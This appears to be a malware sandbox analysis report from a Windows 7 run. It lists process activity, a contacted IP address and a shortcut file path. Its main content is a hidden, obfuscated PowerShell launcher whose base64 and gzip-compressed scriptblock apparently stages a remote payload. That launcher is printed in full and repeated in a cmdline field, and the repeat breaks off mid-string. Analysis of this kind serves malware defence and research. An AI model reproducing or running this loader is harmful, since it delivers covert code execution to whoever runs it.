Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 16, 2024, 2:19 p.m. | Oct. 16, 2024, 2:21 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
2636-
powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
2808
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
86.104.74.31 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AE